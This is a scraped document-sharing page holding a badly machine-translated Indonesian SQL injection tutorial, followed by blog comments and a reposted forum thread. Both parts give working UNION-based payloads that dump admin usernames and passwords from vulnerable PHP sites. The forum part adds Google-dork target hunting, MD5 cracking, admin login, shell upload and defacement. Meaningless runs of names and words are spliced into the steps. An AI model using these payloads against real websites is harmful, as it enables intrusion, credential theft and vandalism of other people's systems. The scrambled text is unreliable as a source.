Professional Documents
Culture Documents
If But Will Step-By-step SQL Injection SQL Injection Hack Hack How Easy Admin
If But Will Step-By-step SQL Injection SQL Injection Hack Hack How Easy Admin
If But Will Step-By-step SQL Injection SQL Injection Hack Hack How Easy Admin
SQL injection is a hacking action performed on the client application by modifying an existing SQL
statement in memory clien application and also the technique of exploiting web applications that use a
database for storing therein data.
character: 'or –
EAT DRINK Wardi colorful
AGUS Lilik Silvi Tito
MARRIED EAT DRINK
together SARIMAN
comments: / * or -
information_schema to version: mysql 5.x version, no support for mysql version 4.x
===========
= Step A: =
===========
Add the characters' at the end of the url or add the character "-" to see if there is an error message.
= Step two: =
==========
find and count the number of tables that exist in the database ...
===========
= Step three: =
===========
to figure out how much appear to use union command
use the version command () or @ @ version to check version of sql command input diapakai who TSB
who went out last nagka
eg: [site] / berita.php? id =- 100 union select 1,2,3,4, version (), 6,7,8 - or
see who is used like a version of version 4's leave because in this ver 4 we have to guess their own table
column n imaginable on the Web because they can not use the command From Information_schema ..
to version 5 then you are lucky to not have to guess the n column table like ver ver 5 4 because it can
use the command From Information_schema ..
============
= Step Four: =
============
SOLIKIN SARIMAN BIN
BIN BIN colorful Wardi
Yanti SULASHADI
SARIMAN colorful BIN
WASTE WATER EAT
DRINK LARGE COMMON
HOUSEHOLD Maid
10000000000000000000
00000 EAT DRINK GLASS
PLATE SOLIKIN ENDANG
HAVID Haris GROSS BIN
ABDULLAH SARIMAN
Wardi Harjono Efendi
Maid HAVE ONCE after
mating repeated over and
over and over ONCE
MARRIED SOLIKIN Haris
DIAS HAVID Widi Yanti
Tito BIN Wardi adit with
colorful colorful EAT
DRINK Wardi Maid
charged with duty COOK
ROOM CLEANING PLATE
WASHING CLOTHES
WASHING SLEEP EAT
DRINK Silvi AGUS ANDI
Anin NUNUS BIN Wardi
SARIMAN EAT DRINK
defecate AGUS Lilik BIN
BIN SARIMAN Wardi
100000000000000000
AGUS Silvi PLATE GLASS
Yanti DIAS SUSKANDANI
BIN Wardi many TIMES
MARRIED
to display the existing tables in the web address is
[Site] / berita.php? Id =- 100 union select 1,2,3,4, table_name, 6,7,8 from information_schema.tables-
===========
= Step Five: =
===========
group_concat command (table_name)>>> included in the numbers who went out last
command from Nowhere information_schema.tables table_schema = database ()>>> inserted after the
last digit
[Site] / berita.php? Id =- 100 union select 1,2,3,4, group_concat (table_name), 6,7,8 from Nowhere
information_schema.tables table_schema = database () -
=============
= Step Six: =
=============
group_concat command (column_name)>>> included in the numbers who went out last
Nowhere information_schema.columns orders from table_name = 0xhexa->>> inserted after the last
digit
[Site] / berita.php? Id =- 100 union select 1,2,3,4, group_concat (column_name), 6,7,8 from
information_schema.columns table_name = 0xhexa-Nowhere
mandatory at this stage you mengextrak words on a hexadecimal table content that is by converting it
www.ascii-convert.co.cc
[Site] / berita.php? Id =- 100 union select 1,2,3,4, group_concat (column_name), 6,7,8 from Nowhere
information_schema.columns table_name = 0 × 61646D696E-
============
= Step-Seven: =
============
concat_ws command (0 × 3a, the contents of the column who want removed)>>> included in the
numbers who went out last
order from (the name derived table)>>> inserted after the last digit
[Site] / berita.php? Id =- 100 union select 1,2,3,4, concat_ws (× 3a 0, the contents of column), 6,7,8 from
(table name derived) -
[Site] / berita.php? Id =- 100 union select 1,2,3,4, concat_ws (0 × 3a, id, username, password), 6,7,8 from
admin-
==============
= Step-Eight: =
==============
The next is up to you because there is a web of power in your hands ...
For More Clearly Can Download Video Tutorial This File With MySQL Injection
DOWNLOAD
Greeting
Gonzhack
Comments RSS Feed Trackback URL Post a comment Share on Twitter Share on Facebook
13 Comments
1.
LinKL says:
of disposable
cat 21:22
cat 22:23
was how mas?
2.
Andyra says:
om said in step 3 would be in the numbers ni?? Indeed figures out that important
om joke ...
3.
Patara says:
Hi guys,
You managed to crash A Few radio stations in the UK on Friday and have very kindly pointed out how
you did it via this blog. Strangly Enough Now I am not upset, Because They are not mine!
However what it is That shows me you are very good and breaking through the UK what techies think
is a safe website. I therefore would like to employ you in a consultancy capacity to let me know how safe
certain sites develope As We Are Them. By this I mean That you are to charge me a consultancy fee per
site to let me know the weak points in any site That I send to you - however a NOT to crash it:)
I understand if you are cautious about Standard and Poor's approach, but want to leave you with a
thought: You guys are very smart - much smarter than my techies in the UK - Who Will be up and
running again at Some point, however I would like to put the knowledge you have to good use and I
always pay Someone WHO teaches me something. When I was younger I studied Martial Arts and was
taught That if Someone punches you in the face, it is Because you have a weak gaurd, so you Should
respect That Can anyone get your through guard and not make excuses for your own Weakness (in
letting the punches get through) well your punches got through and you have my respect:)
Hence I am willing to pay you to teach me how to stop getting passed our gaurd Others.
Regards
Patara
4.
Gardening says:
Hello Guru, what entice you to post an article. This article was extremely interesting, ESPECIALLY
since I was searching for thoughts on this subject last Thursday.
5.
6.
Lidia says:
Mas, had long since learned to hack really want to, not purposely to see this website. Googling my
own again hence the problem of mysql injection nyantron here. That's really great video, dial-up
connection lemot internetku really, is there a smaller version of the pdf? Then there's a tutorial on
writing that is lost or accidentally dilengkapin not ya? please can not ask for the full article? Thanks loh!
7. share] step by step SQL injection just for the learning course
Solutions Forum - Bring news and applicationz FOR YOU:: Computer Stuff:: Networking, Programming &
Scripts:: Hacking
Page 1 of 1 • Share • Actions!
Actions!
Send to a friend
[Share] step by step SQL injection just for the learning course
Post Admin on Thu January 16, 2010 5:14 pm
[Share] step by step SQL injection just for the learning course
since here there is thread "hacking hacking trick-Share is ngetrend" in addition to strengthening my
memory, I am very forgetful soale Wink)? / S7;
I'll share my knowledge this is only a little about how to conduct SQL injection on the web ... (remember
only for learning just ea ... Very Happy)
ga ato useful if too vulgar in del aja .. (Dueh unnoticed if ane ordinary vulgar Very Happy)
Before talking about SQL injection, first I'll explain what it is sql injection and how that could happen.
Actually SQL injection occurs when an attacker can insert some SQL statements to 'query' by
manipulating data input into the application TSB. Among DB formats such as PHP + MySQL and ASP +
MSACCESS or with MySql, here I'm just going to discuss about sql injection in the url only.
1. looking at the first target with a dork mbah google "inurl: index.php? id =" (other dork can nyari on
google, many bgt koq)
Add a single quote character "'" (without quotation marks) at the end of url
if there are errors on web pages means that Erb vuln if not search for other targets ...
3. locate and count the number of tables that exist in databasenya.gunakan command: + order + by +
numbers
http://www.korban.com/index.php?id=1+order+by+1--
http://www.korban.com/index.php?id=1+order+by+2--
http://www.korban.com/index.php?id=1+order+by+3--
http://www.korban.com/index.php?id=1+order+by+4--
then:
http://www.korban.com/index.php?id=1+union+select+1 ,2,3 -
5. figure out who suppose 2 use the command version () to check the version of sql command input
diapakai who TSB who went out last nagka
example:
http://www.korban.com/index.php?id=1+union+select+1, version () .3 -
who see the version used, if left alone version 4 because in this ver 4 we have to guess their own table
column n imaginable on the Web because they can not use the command from + information_schema
to version 5 then you are lucky to not have to guess the n column table like ver 4 because in ver 5 can
use the commands from + information_schema. continue ...
6. To display all the contents of the table address is group_concat command (table_name) -> included in
the numbers who went out last
8.masukkan group_concat command (column_name) -> included in the numbers who went out last
group_concat command (0x3a, the contents of the column who want removed) -> included in the
numbers who went out last
command + from + (the name derived table) -> inserted after the last digit
thus becomes
10. 've met tuh username password na ma ... na tuh stay dencrypt pass. if the form could be on crack
md5 here http://www.md5decrypter.co.uk/
11. search login page Admin -> Login as admin -> Search fitur2 uploaded files or images -> then upload
your shell -> then whatever you want diapain tu web Very Happy. can be hell if directly PM tu web
admin who'll soon have the patch (na e-mail can also search the table yesteryear), Jagan in eah coz
deface web make it hard to sob ...
12. cape dee huft writing that much ..., del aja ga if useful ....
thx for the predecessors who have given science a cuma2 make ane ... Very Happy
Admin
Webmasters
Webmasters
Number of posts: 60
Age: 24
Location: Bandung
points: 89
Reputation: 0
http://speechyourm1nd.blogspot.com/
*
Re: [share] step by step SQL injection just for the learning course
engkoh